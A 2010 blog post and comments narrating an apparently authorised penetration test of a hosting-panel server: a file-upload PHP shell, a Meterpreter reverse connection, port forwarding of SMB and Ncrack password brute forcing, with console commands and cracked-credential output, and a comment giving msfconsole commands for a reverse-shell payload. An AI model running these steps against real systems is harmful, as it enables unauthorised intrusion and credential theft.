Tuesday, July 6, 2010

Metasploit and Ncrack

For some days now i'm working in a case for a client, a pentest project. The story goes like that, there is a server and the price is to get access to that server. The system is a running a control panel to allow clients easy configuration on their domains. As usual there is nothing given except the ip of the server and the papers to sign. From there you are on your own. So where to start.

Only with the IP i couldn't see much on the system just the default page and nothing else, portscan shows some ports open nothing to attack directly or with known vulnerabilities then it occurred to me, this panel by default, is replying on reverse DNS with the full list of the domains that is supporting. So a nslookup IP IP did the trick and i had a list of the domains on the system. I started slowly to browse around the domains looking for outdated applications and other details, one point of entry. It didn't take long to find a misconfigured application that allowed file upload. My first choice was to use the meterpreter from metasploit to initiate a reverse connection ( everything running through a php shell ), it didn't took me long to realize then that the system was firewalled in almost every port. Second choice ahead, meterpreter on reverse https port ! And that did the trick, i had connection.

Almost ready to close the case and write a report to the client, being confident and all, that it's just 2 lines from now to get full access on the system i typed on the console,
meterpreter > use priv
Loading extension priv...success.
meterpreter > 


Followed by the getsystem command where i was greeted with the following not so happy for me message,
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 5

meterpreter >
I got the same or similar error message for all methods and even for the latest method, brand new shinny KiTrap0D that to my surprise it didn't work. Most of the time these servers are not often rebooted ( patched from windows updates ) in order to maintain high uptime on the websites that they are serving.

Not giving up yet, there is always the motto,  "Brute force, when you are not succeeding, you are not using enough". The first option was to brute force on the ftp server for accounts, but i already know that this panel is not allowing the administrator account to login through the ftp, and this account is the only one that i want to find out. I could go for remote desktop brute force but then it will take time, the whole process is very slow on rdp,and then i came across a very good network cracker, ncrack if only i could use it on the system that has the 445 port firewalled...

And here comes again the metasploit,
meterpreter >
portfwd add -l 445 -p 445 -r IP
meterpreter >

The port 445 was forwarded to my system, free from the firewall at last. Time for ncrack to take place.
 ./ncrack -vv -U users.txt localhost:445

and after a few minutes, the first results
Discovered credentials on smb://127.0.0.1:445 'user1' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user2' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user3' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user4' 'abcdef123'

It took almost three hours and 20 minutes to find the administrator password, but finally i had it!

4 comments:

  1. Can you go into a bit more detail regarding the php shell or the command to which payload you were using?

    ReplyDelete
  2. Hi, what i did was the following.

    As i mention i manage to get file upload access. Through that i uploaded a .php file, containing the following line . The file was accessible from the webserver normally like any other file on that domain.
    At msfconsole i used,
    use exploit/unix/webapp/php_include
    set PAYLOAD php/meterpreter_reverse_tcp
    set RHOST www.domain.xxx
    set PHPURI /myfile.php?path=XXpathXX
    exploit

    I could use any other file for php shell access or asp shell for that server, but meterpreter gives a lot of options that you can use.

    ReplyDelete